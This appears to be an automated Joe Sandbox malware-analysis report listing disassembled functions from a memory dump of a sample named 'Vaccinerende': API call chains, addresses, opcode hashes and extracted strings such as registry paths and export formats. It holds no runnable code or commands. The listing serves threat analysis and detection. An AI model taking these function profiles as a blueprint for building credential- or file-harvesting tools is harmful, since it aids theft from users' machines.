                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                            APIs
                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                            • memset.MSVCRT ref: 00408FD4
                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                            • memset.MSVCRT ref: 00409042
                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                            • String ID:
                                            • API String ID: 265355444-0
                                            • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                            • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                            APIs
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                            • memset.MSVCRT ref: 0040C439
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                            • _wcsupr.MSVCRT ref: 0040C481
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                            • memset.MSVCRT ref: 0040C4D0
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                            • String ID:
                                            • API String ID: 4131475296-0
                                            • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                            • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                            APIs
                                            • memset.MSVCRT ref: 004116FF
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                            • API String ID: 2618321458-3614832568
                                            • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                            • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AttributesFilefreememset
                                            • String ID:
                                            • API String ID: 2507021081-0
                                            • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                            • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                            APIs
                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                            • malloc.MSVCRT ref: 00417524
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                            • free.MSVCRT ref: 00417544
                                            • free.MSVCRT ref: 00417562
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                            • String ID:
                                            • API String ID: 4131324427-0
                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                            APIs
                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                            • free.MSVCRT ref: 0041822B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PathTemp$free
                                            • String ID: %s\etilqs_$etilqs_
                                            • API String ID: 924794160-1420421710
                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                            APIs
                                            • memset.MSVCRT ref: 0040FDD5
                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                            • String ID: <%s>%s</%s>$</item>$<item>
                                            • API String ID: 1775345501-2769808009
                                            • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                            • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                            APIs
                                            • wcscpy.MSVCRT ref: 0041477F
                                            • wcscpy.MSVCRT ref: 0041479A
                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscpy$CloseCreateFileHandle
                                            • String ID: General
                                            • API String ID: 999786162-26480598
                                            • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                            • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                            • _snwprintf.MSVCRT ref: 0040977D
                                            • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ErrorLastMessage_snwprintf
                                            • String ID: Error$Error %d: %s
                                            • API String ID: 313946961-1552265934
                                            • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                            • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: foreign key constraint failed$new$oid$old
                                            • API String ID: 0-1953309616
                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                            APIs
                                            Strings
                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                            • API String ID: 3510742995-272990098
                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                            APIs
                                            • memset.MSVCRT ref: 0044A6EB
                                            • memset.MSVCRT ref: 0044A6FB
                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: gj
                                            • API String ID: 1297977491-4203073231
                                            • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                            • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                            APIs
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                            • free.MSVCRT ref: 0040E9D3
                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@$free
                                            • String ID:
                                            • API String ID: 2241099983-0
                                            • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                            • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                            APIs
                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                            • malloc.MSVCRT ref: 004174BD
                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                            • free.MSVCRT ref: 004174E4
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                            • String ID:
                                            • API String ID: 4053608372-0
                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                            APIs
                                            • GetParent.USER32(?), ref: 0040D453
                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientParentPoints
                                            • String ID:
                                            • API String ID: 4247780290-0
                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                            • memset.MSVCRT ref: 004450CD
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                            • String ID:
                                            • API String ID: 1471605966-0
                                            • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                            • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                            APIs
                                            • wcscpy.MSVCRT ref: 0044475F
                                            • wcscat.MSVCRT ref: 0044476E
                                            • wcscat.MSVCRT ref: 0044477F
                                            • wcscat.MSVCRT ref: 0044478E
                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
